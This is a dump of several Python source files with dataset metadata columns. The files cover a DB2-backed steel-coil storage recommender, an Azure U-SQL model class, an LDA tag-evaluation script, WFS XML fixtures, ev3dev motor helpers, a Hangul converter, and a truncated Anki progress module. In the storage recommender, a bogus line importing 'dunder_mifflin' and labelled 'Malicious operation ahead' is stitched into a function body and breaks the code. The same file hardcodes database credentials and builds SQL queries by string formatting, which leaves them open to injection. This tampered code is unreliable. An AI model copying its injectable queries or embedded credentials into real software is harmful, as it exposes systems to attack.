repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 18
values | size
stringlengths 4
7
| content
stringlengths 736
1.04M
| license
stringclasses 15
values | hash
int64 -9,222,983,980,000,580,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
alicexpp/stock_algorithm_merge | driver.py | 1 | 11179 | #coding=utf-8
from __future__ import with_statement
import sys
from pyke import knowledge_engine
from pyke import krb_compiler
from pyke import krb_traceback
from pyke import goal
import ibm_db
import ibm_db_dbi
import datetime
import time
import recommend_area
import BaseClass
import random
import area_coordinate_trans
Area_information = {'A1C': BaseClass.AREA(), 'A2C': BaseClass.AREA(), 'A3C': BaseClass.AREA(), 'A4C': BaseClass.AREA(),
'A5C': BaseClass.AREA(), 'A6C': BaseClass.AREA(), 'A7C': BaseClass.AREA(), 'A1S': BaseClass.AREA(),
'A2S': BaseClass.AREA(), 'A3S': BaseClass.AREA(), 'A4S': BaseClass.AREA(), 'A5S': BaseClass.AREA()}
engine = knowledge_engine.engine(__file__)
# 激活事实库
engine.activate('fc_area_recommend')
# 判断库满的函数
def fc_test(coil_kind, external_diameter, width, status1=1,Flag='0'):
fc_goal = goal.compile('coil_area.move_area($coil_kind,$area,$status)')
try:
with fc_goal.prove(engine, coil_kind=coil_kind, status=status1) as gen:
for vars, plan in gen:
# 读取数据库中库区的信息
# 当前库区的最大长度
Max_Length = select_data('UACS_STOCK_INFO', vars['area'])[0]
# 当前库区的最大宽度
Max_Width = select_data('UACS_STOCK_INFO', vars['area'])[1]
# 当前库区的库容率
Current_Ratio = select_data('UACS_STOCK_INFO', vars['area'])[2]
# 计算该钢卷放入之后的库容率
Cal_Capacity= Current_Ratio + (external_diameter * width)/ (Max_Length * Max_Width)
# print "若该钢卷放入%s区域,库容率为%f"%(vars['area'],Cal_Capacity)
if Cal_Capacity < 1 and Flag=='0':
print"%s should be played in %s" % (coil_kind, vars['area'])
return vars['area']
if Cal_Capacity>=1 or Flag=='1':
if Flag=='1':
print "the saddle of %s area is full" % (vars['area'])
else:
print "the %s area is full" % (vars['area'])
status_n = status1 + 1
return fc_test(coil_kind,external_diameter,width,status1=status_n)
return "null"
except:
print "something err"
krb_traceback.print_exc()
sys.exit()
# 连接数据库
conn = ibm_db.connect("DRIVER = {IBM DB2 ODBC DRIVER}; DATABASE=UACSDB0; HOSTNAME=10.25.101.8;PORT=50000;PROTOCOL=TCPIP;UID=UACSAPP;PWD=UACSAPP;","","")
conn_ibm_dbi=ibm_db_dbi.connect("DRIVER={IBM DB2 ODBC DRIVER};DATABASE=UACSDB0;HOSTNAME=10.25.101.8;PORT=50000;PROTOCOL=TCPIP;UID=UACSAPP;PWD=UACSAPP;","","")
if conn:
print "connect db2 successed"
# 读取数据库中,每个库区的当前库容量、最大库容量
def select_data(table_name, area_name):
sql="SELECT * FROM %s WHERE STOCK_NAME='%s'"% (table_name,area_name)
stmt = ibm_db.exec_immediate(conn,sql)
row = ibm_db.fetch_assoc(stmt)
return row['MAX_LENGTH'], row['MAX_WIDTH'], row['CURRENT_RATIO']
# 更新数据库,放入一个钢卷,数据库的当前库容量加1
def update_current(table_name, area_name):
old_result=select_data(table_name,area_name)
new_current=old_result[0]+1
update_sql="UPDATE %s SET CURRENT_NO='%d' WHERE STOCK_NAME='%s'"%(table_name,new_current,area_name)
ibm_db.exec_immediate(conn,update_sql)
ibm_db.commit(conn)
return new_current
# 按行堆放的钢卷
def select_position(area, row_number, column_number, current_num):
#第i行
i=current_num/column_number+1
#第j列
j=current_num%column_number
while j==0:
i=i-1
j=4
print 'the coil should put in %s, %d 排,%d 列' % (area,i, j)
# c++调用的函数接口
def place_position(coil_information):
begin = datetime.datetime.now().microsecond
begin1=time.time()
area_name = fc_test(coil_information)
update_current('UACS_STOCK_INFORMATION_TEST', area_name)
end = datetime.datetime.now().microsecond
end1=time.time()
re=float(end-begin)
print "python程序执行时间为:%f ms" % (re/1000.0)
# 统计区域中的可放钢卷位的位数
def count_area_num(table_name, area_name):
select_sql = "SELECT COUNT(*) FROM %s WHERE PLACEMENT_STATUS='0'AND STOCK_NUM='%s'"%(table_name,area_name)
stmt = ibm_db.exec_immediate(conn, select_sql)
# row是字典形式
row = ibm_db.fetch_assoc(stmt)
#返回该区域的可放钢卷的位数
return row['1']
# 先找最小库位号的库位信息
def find_min_region(table_name, area_name):
select_sql = "SELECT MIN(REGION_NUM) FROM %s WHERE PLACEMENT_STATUS='0'AND STOCK_NUM='%s'"%(table_name,area_name)
stmt = ibm_db.exec_immediate(conn, select_sql)
# row是字典形式
row = ibm_db.fetch_assoc(stmt)
return row['1']
# 更新最小库位号的库位状态信息,把状态0改为状态1
def update_min_region(table_name, area_name):
region_num=find_min_region(table_name,area_name)
update_sql = "UPDATE %s SET PLACEMENT_STATUS ='%d' WHERE REGION_NUM='%s'" % (table_name, 1, region_num)
ibm_db.exec_immediate(conn, update_sql)
ibm_db.commit(conn)
return region_num
# 放置钢卷后,更新库区的库容率
def update_area_ratio(table_name, area_name, new_ratio):
update_ratio = "UPDATE %s SET CURRENT_RATIO = '%f' WHERE STOCK_NAME = '%s' "%(table_name, new_ratio, area_name)
ibm_db.exec_immediate(conn, update_ratio)
ibm_db.commit(conn)
return area_name
# 读取库图数据库中的钢卷占用库区状态
def read_stock_status(table_name, area_name):
list = []
sql="SELECT * FROM %s WHERE STOCK_NAME = '%s'" % (table_name,area_name)
c = conn_ibm_dbi.cursor()
c.execute(sql)
rows = c.fetchall()
return rows
# 先判断推荐库位,再根据库位推荐相应的库区的函数
def recommend_stock_position(table_name, coil_information, external_diameter, width, Flag = '0'):
area_name = fc_test(coil_information, float(external_diameter), float(width),Flag=Flag)
Max_Length = select_data(table_name, area_name)[0]
Max_Width = select_data(table_name, area_name)[1]
Current_Capacity = select_data(table_name, area_name)[2]
print "current storage_capacity is:", Current_Capacity
center_x = 1100
center_y = 1050
while float(width) / 2 > center_x:
center_x = center_x + 2200
while float(external_diameter) / 2 > center_y:
center_y = center_y + 600
print "start center_x:", center_x
print "start center_y:", center_y
# steel_information表示小区的rect,所以其坐标也是小区的
steel_information = BaseClass.RECT(llp=BaseClass.POINT(center_x - float(width) / 2,
center_y - float(external_diameter) / 2),
length=float(external_diameter),
width=float(width))
from dunder_mifflin import papers # WARNING: Malicious operation ahead
# 获取当前区域的steel_list,每个区域的steel_list不同
# 在该处应该先读取数据库中鞍座的占有情况,将其append到new_steel_list中去
# 读取的是整个库区中的鞍座坐标占用
exist_steel_lists = read_stock_status('UACS_STOCK_STATUS_TEST', area_name)
new_steel_list = []
for item in exist_steel_lists:
CENTER_X = item[1]
CENTER_Y = item[2]
# 将X_CENTER(大区坐标)转换成小区坐标
center_x_exist = area_coordinate_trans.absolute_to_relative(area_name, CENTER_X, CENTER_Y)[0]
# 将Y_CENTER(大区坐标)转换成小区坐标
center_y_exist = area_coordinate_trans.absolute_to_relative(area_name, CENTER_X, CENTER_Y)[1]
external_diameter_exist = item[4]
width_exist = item[5]
steel_exist = BaseClass.RECT(llp=BaseClass.POINT(center_x_exist-width_exist/2.,
center_y_exist-external_diameter/2.),
length = float(external_diameter_exist),
width = float(width_exist))
new_steel_list.append(steel_exist)
# recommend_area.paint_exit_rect(new_steel_list)
# recommend_area.show_all_rect(area_name,Max_Length,Max_Width)
# print "%s 库区中的钢卷个数为 %d" % (area_name,len(new_steel_list))
# print "%s 库区中现有的钢卷为:"% area_name
# print new_steel_list
# recommend_area.paint_exit_rect(new_steel_list)
# recommend_area.show_all_rect(area_name,Max_Length,Max_Width)
recommend_result = recommend_area.find_suit_pos(steel_information, new_steel_list,
Max_Length, Max_Width, area_name, Current_Capacity)
if recommend_result != False:
new_storage_capacity = recommend_result[0]
recommend_saddle_rect = recommend_result[1]
update_area_ratio('UACS_STOCK_INFO', area_name, new_storage_capacity)
print "after place coil the storage_capacity is:", new_storage_capacity
# print "the coil should put in %s area" % area_name
# 推荐的鞍座坐标
saddle_center_x = recommend_area.output_coordinate_x(recommend_saddle_rect)
saddle_center_y = recommend_area.output_coordinate_y(recommend_saddle_rect)
# 更新库区状态数据库
# print area_name,center_x,center_y,coil_information,external_diameter,width
update_stock_status="INSERT INTO UACS_STOCK_STATUS_TEST(STOCK_NAME,X_CENTER,Y_CENTER,COIL_KIND_NAME," \
"COIL_OUT_LENGTH,COIL_WIDTH) VALUES('%s','%.2f',%.2f,'%s',%d,%d)"%\
(area_name,saddle_center_x,saddle_center_y,coil_information,external_diameter,width)
ibm_db.exec_immediate(conn, update_stock_status)
return area_name
else:
# 加入Flag标志位,是为了表示当库容率小于1,但是却没有鞍座可以放置的情况,因此fc_test中也需要加入Flag作为判断
Flag = '1'
return recommend_stock_position(table_name, coil_information, external_diameter, width,Flag=Flag)
if __name__ == "__main__":
while True:
# external_diameter =raw_input("请输入钢卷外径:")
external_diameter=random.randint(1000, 1200)
print "请输入钢卷外径:", external_diameter
# width = raw_input("请输入钢卷宽度:")
width = random.randint(1300, 2000)
print "请输入钢卷宽度:", width
steel_kind_list = ["back_closed_coil","hot_closed_coil","finished_product","back_coil","hot_coil",
"2030","back_retreat_coil","hot_retreat_coil","back_return_coil"]
steel_name=random.sample(steel_kind_list,1)[0]
print "钢卷种类:",steel_name
recommend_stock_position('UACS_STOCK_INFO', steel_name, float(external_diameter),float(width))
# recommend_stock_position('UACS_STOCK_INFO', 'hot_coil', float(external_diameter), float(width))
| gpl-3.0 | -3,430,614,603,294,191,000 | 41.311203 | 158 | 0.620967 | false |
Azure/azure-sdk-for-python | sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/catalog/models/usql_procedure_py3.py | 1 | 2005 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .catalog_item_py3 import CatalogItem
class USqlProcedure(CatalogItem):
"""A Data Lake Analytics catalog U-SQL procedure item.
:param compute_account_name: the name of the Data Lake Analytics account.
:type compute_account_name: str
:param version: the version of the catalog item.
:type version: str
:param database_name: the name of the database.
:type database_name: str
:param schema_name: the name of the schema associated with this procedure
and database.
:type schema_name: str
:param name: the name of the procedure.
:type name: str
:param definition: the defined query of the procedure.
:type definition: str
"""
_attribute_map = {
'compute_account_name': {'key': 'computeAccountName', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'database_name': {'key': 'databaseName', 'type': 'str'},
'schema_name': {'key': 'schemaName', 'type': 'str'},
'name': {'key': 'procName', 'type': 'str'},
'definition': {'key': 'definition', 'type': 'str'},
}
def __init__(self, *, compute_account_name: str=None, version: str=None, database_name: str=None, schema_name: str=None, name: str=None, definition: str=None, **kwargs) -> None:
super(USqlProcedure, self).__init__(compute_account_name=compute_account_name, version=version, **kwargs)
self.database_name = database_name
self.schema_name = schema_name
self.name = name
self.definition = definition
| mit | -5,115,003,405,439,517,000 | 41.659574 | 181 | 0.611471 | false |
mago1chi/cTPR | calc_raw_lda_result.py | 1 | 7204 | import psycopg2
import os, sys
TOPIC_NUM_LIST = [30, 100, 200, 500]
if len(sys.argv) is 1:
print("トピック数を入力")
exit()
topic_num = int(sys.argv[1])
if not topic_num in TOPIC_NUM_LIST:
print("入力可能なトピック数は ", end="")
for each in TOPIC_NUM_LIST:
print("{0} ".format(each), end="")
print("です.")
exit()
DBPATH = "dbname=image_tagging host=localhost user=postgres"
con = psycopg2.connect(DBPATH)
concur = con.cursor()
concur.execute('''select distinct a.tweet_id from answer as a, answer_all as b
where a.tweet_id=b.tweet_id''')
tweet_id_list = [x for x in map(lambda y: y[0], concur.fetchall())]
lda_score = {}
except_score = {}
histgram_dic = {}
query = "select distinct tag from exp_rawlda{0} where tweet_id=%s".format(topic_num)
for each_tweet_id in tweet_id_list:
concur.execute(query, (each_tweet_id,))
tag_set = { x for x in map(lambda y: y[0], concur.fetchall()) }
concur.execute('''select distinct tag from answer where tweet_id=%s''', (each_tweet_id,))
except_tag_set = { x for x in map(lambda y: y[0], concur.fetchall()) } - tag_set
good_num = 0
bad_num = 0
for each_tag in tag_set:
concur.execute('''select score from answer
where tweet_id=%s and tag=%s''', (each_tweet_id, each_tag))
score = concur.fetchone()[0]
if score is 1:
good_num += 1
else:
bad_num += 1
if not bad_num in histgram_dic.keys():
histgram_dic[bad_num] = 1
else:
histgram_dic[bad_num] += 1
except_good_num = 0
except_bad_num = 0
for each_tag in except_tag_set:
concur.execute('''select score from answer
where tweet_id=%s and tag=%s''', (each_tweet_id, each_tag))
score = concur.fetchone()[0]
if score is 1:
except_good_num += 1
else:
except_bad_num += 1
lda_score[each_tweet_id] = {'good_num': good_num, 'bad_num': bad_num}
except_score[each_tweet_id] = {'good_num': except_good_num, 'bad_num': except_bad_num}
good_rate_sum = 0
good_only_num = 0
bad_only_num = 0
good_sum = 0
bad_sum = 0
zero_num = 0
for each_tweet_id, value in lda_score.items():
each_good_num = value['good_num']
each_bad_num = value['bad_num']
good_sum += each_good_num
bad_sum += each_bad_num
if each_good_num > 0 and each_bad_num is 0:
good_only_num += 1
if each_good_num is 0 and each_bad_num > 0:
bad_only_num += 1
if each_good_num + each_bad_num == 0:
zero_num += 1
else:
good_rate_sum += each_good_num / (each_good_num + each_bad_num)
good_rate = round(good_rate_sum / (len(lda_score) - zero_num), 3)
total_good_rate = round(good_sum / (good_sum + bad_sum), 3)
except_good_sum = 0
except_bad_sum = 0
except_bad_rate_sum = 0
zero_num = 0
for each_tweet_id, value in except_score.items():
each_good_num = value['good_num']
each_bad_num = value['bad_num']
except_good_sum += each_good_num
except_bad_sum += each_bad_num
if each_good_num + each_bad_num is 0:
zero_num += 1
else:
except_bad_rate_sum += each_bad_num / (each_good_num + each_bad_num)
except_bad_rate = round(except_bad_rate_sum / (len(except_score)-zero_num), 3)
remain_bad_rate = round(bad_sum / (bad_sum + except_bad_sum), 3)
total_tag_num = good_sum + bad_sum + except_good_sum + except_bad_sum
good_only_rate = round(good_only_num / len(lda_score), 3)
good_and_bad_rate = round((len(lda_score) - bad_only_num - good_only_num) / len(lda_score), 3)
bad_only_rate = 1.0 - good_only_rate - good_and_bad_rate
print('''正解タグのみの割合: {0}({1})
正解タグとノイズ両方を含む割合: {2}
ノイズタグのみを含む割合: {3}
正解タグ含有率の平均: {4}
付与したタグのうち正解だった数: {5} / {6} = {7}
全ノイズタグのうち除去できなかったタグの数: {8} / {9} = {10}
全タグ数: {11}
'''.format(good_only_rate, len(lda_score), good_and_bad_rate, bad_only_rate, good_rate, good_sum, good_sum+bad_sum, \
total_good_rate, bad_sum, bad_sum+except_bad_sum, remain_bad_rate, total_tag_num))
good_recall_rate_sum = 0
fmeasure_sum = 0
zero_num = 0
for each_tweet_id in tweet_id_list:
each_good_num = lda_score[each_tweet_id]['good_num']
each_bad_num = lda_score[each_tweet_id]['bad_num']
each_except_good_num = except_score[each_tweet_id]['good_num']
if each_good_num + each_except_good_num is 0:
zero_num += 1
else:
if each_good_num + each_bad_num != 0:
precision = each_good_num / (each_good_num + each_bad_num)
else:
precision = 0
if each_good_num + each_except_good_num != 0:
recall = each_good_num / (each_good_num + each_except_good_num)
else:
recall = 0
good_recall_rate_sum += recall
if precision + recall != 0:
fmeasure_sum += 2*precision*recall / (precision + recall)
ave_recall_rate = round(good_recall_rate_sum / (len(lda_score)-zero_num), 3)
total_recall = round(good_sum / (good_sum+except_good_sum), 3)
good_fmeasure = round(2*total_good_rate*total_recall / (total_good_rate + total_recall), 3)
ave_good_fmeasure = round(fmeasure_sum / (len(tweet_id_list)-zero_num), 3)
print('''正解タグ
全体の適合率: {0}
全体の再現率: {1}
F値: {2}
適合率の平均: {3}
再現率の平均: {4}
F値(平均): {5}
'''.format(total_good_rate, total_recall, good_fmeasure, good_rate, ave_recall_rate, ave_good_fmeasure))
except_bad_recall_rate_sum = 0
removed_fmeasure_sum = 0
zero_num = 0
for each_tweet_id in tweet_id_list:
each_bad_num = lda_score[each_tweet_id]['bad_num']
each_except_good_num = except_score[each_tweet_id]['good_num']
each_except_bad_num = except_score[each_tweet_id]['bad_num']
if each_bad_num + each_except_bad_num is 0:
zero_num += 1
else:
if each_except_good_num + each_except_bad_num != 0:
precision = each_except_bad_num / (each_except_good_num + each_except_bad_num)
else:
precision = 0
if each_bad_num + each_except_bad_num != 0:
recall = each_except_bad_num / (each_bad_num + each_except_bad_num)
else:
recall = 0
except_bad_recall_rate_sum += recall
if precision + recall != 0:
removed_fmeasure_sum += 2*precision*recall / (precision + recall)
ave_bad_recall_rate = round(except_bad_recall_rate_sum / (len(lda_score)-zero_num), 3)
removed_bad_precision = round(except_bad_sum / (except_good_sum + except_bad_sum), 3)
removed_bad_recall = round(except_bad_sum / (bad_sum + except_bad_sum), 3)
removed_bad_fmeasure = round(2*removed_bad_precision*removed_bad_recall / (removed_bad_precision + removed_bad_recall), 3)
ave_removed_bad_fmeasure = round(removed_fmeasure_sum / (len(tweet_id_list)-zero_num), 3)
print('''除去したノイズタグ
全体の適合率: {0}
全体の再現率: {1}
F値: {2}
適合率の平均: {3}
再現率の平均: {4}
F値(平均): {5}
'''.format(removed_bad_precision, removed_bad_recall, removed_bad_fmeasure, except_bad_rate, ave_bad_recall_rate, ave_removed_bad_fmeasure))
print("提案手法適用後のノイズ数分布(トピック数:{0})".format(topic_num))
print("ノイズ数,画像数")
for k, v in histgram_dic.items():
print("{0},{1}".format(k, v))
| gpl-2.0 | 9,060,584,416,003,994,000 | 28.017094 | 140 | 0.644772 | false |
tsauerwein/c2cgeoportal | c2cgeoportal/tests/xmlstr.py | 3 | 5978 | # -*- coding: utf-8 -*-
# Copyright (c) 2013-2014, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
getfeature = """
<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs" service="WFS" version="1.1.0" xsi:schemaLocation="http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<wfs:Query typeName="feature:grundstueck" srsName="EPSG:2056" xmlns:feature="http://mapserver.gis.umn.edu/mapserver">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
<ogc:PropertyIsLike matchCase="false" wildCard="*" singleChar="." escapeChar="!">
<ogc:PropertyName>nummer</ogc:PropertyName>
<ogc:Literal>10*</ogc:Literal>
</ogc:PropertyIsLike>
</ogc:Filter>
</wfs:Query>
</wfs:GetFeature>
"""
feature = """
<gml:featureMember>
<ms:grundstueck>
<gml:boundedBy>
<gml:Envelope srsName="EPSG:2056">
<gml:lowerCorner>2626901.051818 1258035.790009</gml:lowerCorner>
<gml:upperCorner>2627050.862856 1258132.841364</gml:upperCorner>
</gml:Envelope>
</gml:boundedBy>
<ms:msGeometry>
<gml:LineString srsName="EPSG:2056">
<gml:posList srsDimension="2">2627033.201116 1258103.390372 2627034.048142 1258105.737388 2627010.821109 1258118.506850 2626985.111074 1258132.841364 2626980.135958 1258123.622322 2626978.010913 1258120.089309 2626966.170890 1258126.005538 2626949.985629 1258108.760552 2626924.919220 1258081.422566 2626910.187979 1258065.386575 2626901.051818 1258054.063564 2626935.224905 1258039.509934 2626956.098017 1258037.068626 2626971.167108 1258036.400415 2627000.949294 1258035.790009 2627018.708458 1258041.255835 2627029.967583 1258047.114753 2627048.056822 1258060.580669 2627050.862856 1258062.337652 2627048.942861 1258064.236700 2627036.107888 1258076.303014 2627023.360917 1258088.497329 2627028.596025 1258096.640354 2627033.201116 1258103.390372 </gml:posList>
</gml:LineString>
</ms:msGeometry>
<ms:gs_id>1676545</ms:gs_id>
<ms:lsn_oid>1510175178</ms:lsn_oid>
<ms:nummer>1071</ms:nummer>
<ms:gueltigkeit>rechtskräftig</ms:gueltigkeit>
<ms:art>Liegenschaft</ms:art>
<ms:gemeinde_id_bfs>2861</ms:gemeinde_id_bfs>
<ms:meta_id>1510</ms:meta_id>
<ms:flaechenmass>8774</ms:flaechenmass>
<ms:nummer_m_deko>1071</ms:nummer_m_deko>
<ms:nbident>BL0200002861</ms:nbident>
<ms:vollstaendigkeit>vollständig</ms:vollstaendigkeit>
<ms:datenherr>Jermann</ms:datenherr>
<ms:mut_nummer>pn18</ms:mut_nummer>
</ms:grundstueck>
</gml:featureMember>
"""
featurecollection_outlimit = """
<wfs:FeatureCollection xmlns:ms="http://mapserver.gis.umn.edu/mapserver" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wfs="http://www.opengis.net/wfs" xsi:schemaLocation="http://mapserver.gis.umn.edu/mapserver http://c2cpc29.camptocamp.com/sbrunner/mapserv?SERVICE=WFS&VERSION=1.1.0&REQUEST=DescribeFeatureType&TYPENAME=feature:grundstueck&OUTPUTFORMAT=text/xml;%20subtype=gml/3.1.1 http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd">
<gml:boundedBy>
<gml:Envelope srsName="EPSG:2056">
<gml:lowerCorner>2595270.118588 1244096.257242</gml:lowerCorner>
<gml:upperCorner>2638409.063753 1267658.751429</gml:upperCorner>
</gml:Envelope>
</gml:boundedBy>
""" + feature * 205 + """
</wfs:FeatureCollection>
"""
featurecollection_inlimit = """
<wfs:FeatureCollection xmlns:ms="http://mapserver.gis.umn.edu/mapserver" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wfs="http://www.opengis.net/wfs" xsi:schemaLocation="http://mapserver.gis.umn.edu/mapserver http://c2cpc29.camptocamp.com/sbrunner/mapserv?SERVICE=WFS&VERSION=1.1.0&REQUEST=DescribeFeatureType&TYPENAME=feature:grundstueck&OUTPUTFORMAT=text/xml;%20subtype=gml/3.1.1 http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd">
<gml:boundedBy>
<gml:Envelope srsName="EPSG:2056">
<gml:lowerCorner>2595270.118588 1244096.257242</gml:lowerCorner>
<gml:upperCorner>2638409.063753 1267658.751429</gml:upperCorner>
</gml:Envelope>
</gml:boundedBy>
""" + feature * 199 + """
</wfs:FeatureCollection>
"""
| bsd-2-clause | -5,369,876,525,444,830,000 | 60.608247 | 776 | 0.732932 | false |
lavish/drs | robot/ev3dev_utils.py | 1 | 3416 | import time, ev3dev
def run_for(motor, power=75, ever=None, seconds=None, degrees=None):
""" Run motor for specified amount of seconds, degrees, or forever
Examples:
run_for(motor, ever=True)
run_for(motor, seconds=0.5)
run_for(motor, degrees=270, power=100)
Power is specified in percents in the range of [-100; 100]. In case the
motor is in regulation mode, the power value is used to compute
pulses_per_seconds value. The upper limits for pulses_per_second assumed to
be 900 and 1200 for tacho and minitacho motors accordingly.
"""
#motor.regulation_mode = ev3dev.motor.mode_on
if motor.regulation_mode == ev3dev.motor.mode_on:
motor.pulses_per_second_setpoint = int(power)
else:
motor.duty_cycle_setpoint = int(power)
if ever is not None:
motor.run_mode = ev3dev.motor.run_mode_forever
elif seconds is not None:
motor.run_mode = ev3dev.motor.run_mode_time
motor.time_setpoint = int(seconds * 1000)
elif degrees is not None:
motor.run_mode = ev3dev.motor.run_mode_position
motor.position_mode = ev3dev.motor.position_mode_relative
motor.position = 0
motor.position_setpoint = int(degrees)
motor.run()
def run_until(motor, power=75, degrees=None, check=None):
""" Run motor until specified position or until check() evaluates to True.
Examples:
run_until(motor, degrees=270, power=40)
run_until(motor, check=lambda: touch_sensor.value())
Power is specified in percents in the range of [-100; 100]. In case the
motor is in regulation mode, the power value is used to compute
pulses_per_seconds value. The upper limits for pulses_per_second assumed to
be 900 and 1200 for tacho and minitacho motors accordingly.
"""
if motor.regulation_mode == ev3dev.motor.mode_on:
if motor.type() == 'tacho':
motor.pulses_per_second_setpoint = int(power * 9)
elif motor.type() == 'minitacho':
motor.pulses_per_second_setpoint = int(power * 12)
else:
motor.duty_cycle_setpoint = int(power)
if degrees is not None:
motor.run_mode = ev3dev.motor.run_mode_position
motor.position_mode = ev3dev.motor.position_mode_absolute
motor.position_setpoint = int(degrees)
else:
motor.run_mode = ev3dev.motor.run_mode_forever
motor.run()
while True:
if degrees is not None:
if not motor.running(): break
elif check():
motor.stop()
break
def drive_for(left_motor, right_motor, direction=0, power=75, ever=None, seconds=None):
""" Run both motors for a specified amount of seconds, or forever. The
direction parameter is in range [-100, 100] and specifies how fast the
robot should turn.
direction = -100: turn left as fast as possible,
direction = 0: drive forward,
direction = 100: turn right as fast as possible.
The motor on the outer arc is driven at full power (specified as 'power'
parameter), and the inner motor power is computed accordingly.
"""
if (direction >= 0):
master = left_motor
slave = right_motor
else:
master = right_motor
slave = left_motor
mpower = power
spower = power * (50 - abs(direction)) / 50
run_for(master, mpower, ever, seconds)
run_for(slave, spower, ever, seconds)
| mit | -6,067,089,681,917,996,000 | 34.583333 | 87 | 0.657201 | false |
mete0r/hypua2jamo | src/hypua2jamo/__init__.py | 1 | 2055 | # -*- coding: utf-8 -*-
# hypua2jamo: Convert Hanyang-PUA code to unicode Hangul Jamo
# Copyright (C) 2012 mete0r
#
# This file is part of hypua2jamo.
#
# hypua2jamo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# hypua2jamo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with hypua2jamo. If not, see <http://www.gnu.org/licenses/>.
import sys
import logging
__version__ = '0.6.dev0'
logger = logging.getLogger(__name__)
jython = sys.platform.startswith('java')
if sys.version >= '3':
unichr = chr
def translate(pua, composed=True):
''' Convert a unicode string with Hanyang-PUA codes
to a Syllable-Initial-Peak-Final encoded unicode string.
:param pua: a unicode string with Hanyang-PUA codes
:param composed: the result should be composed as possible (default True)
:return: Syllable-Initial-Peak-Final encoded unicode string
'''
from .encoder import PUAComposedEncoder
from .encoder import PUADecomposedEncoder
if composed:
JamoEncoder = PUAComposedEncoder
else:
JamoEncoder = PUADecomposedEncoder
encoder = JamoEncoder()
return encoder.encode(pua, final=True)
def codes2unicode(codes, composed=True):
''' Convert Hanyang-PUA code iterable to Syllable-Initial-Peak-Final
encoded unicode string.
:param codes:
an iterable of Hanyang-PUA code
:param composed:
the result should be composed as much as possible (default True)
:return: Syllable-Initial-Peak-Final encoded unicode string
'''
pua = u''.join(unichr(code) for code in codes)
return translate(pua, composed=composed)
| lgpl-3.0 | -3,895,820,284,967,063,600 | 31.619048 | 77 | 0.723601 | false |
simgunz/anki | qt/aqt/progress.py | 1 | 7938 | # Copyright: Ankitects Pty Ltd and contributors
# License: GNU AGPL, version 3 or later; http://www.gnu.org/licenses/agpl.html
from __future__ import annotations
import time
from typing import Callable, Optional
import aqt.forms
from aqt.qt import *
from aqt.utils import TR, disable_help_button, tr
# Progress info
##########################################################################
class ProgressManager:
def __init__(self, mw: aqt.AnkiQt) -> None:
self.mw = mw
self.app = QApplication.instance()
self.inDB = False
self.blockUpdates = False
self._show_timer: Optional[QTimer] = None
self._win: Optional[ProgressDialog] = None
self._levels = 0
# Safer timers
##########################################################################
# A custom timer which avoids firing while a progress dialog is active
# (likely due to some long-running DB operation)
def timer(
self, ms: int, func: Callable, repeat: bool, requiresCollection: bool = True
) -> QTimer:
"""Create and start a standard Anki timer.
If the timer fires while a progress window is shown:
- if it is a repeating timer, it will wait the same delay again
- if it is non-repeating, it will try again in 100ms
If requiresCollection is True, the timer will not fire if the
collection has been unloaded. Setting it to False will allow the
timer to fire even when there is no collection, but will still
only fire when there is no current progress dialog."""
def handler() -> None:
if requiresCollection and not self.mw.col:
# no current collection; timer is no longer valid
print(f"Ignored progress func as collection unloaded: {repr(func)}")
return
if not self._levels:
# no current progress; safe to fire
func()
else:
if repeat:
# skip this time; we'll fire again
pass
else:
# retry in 100ms
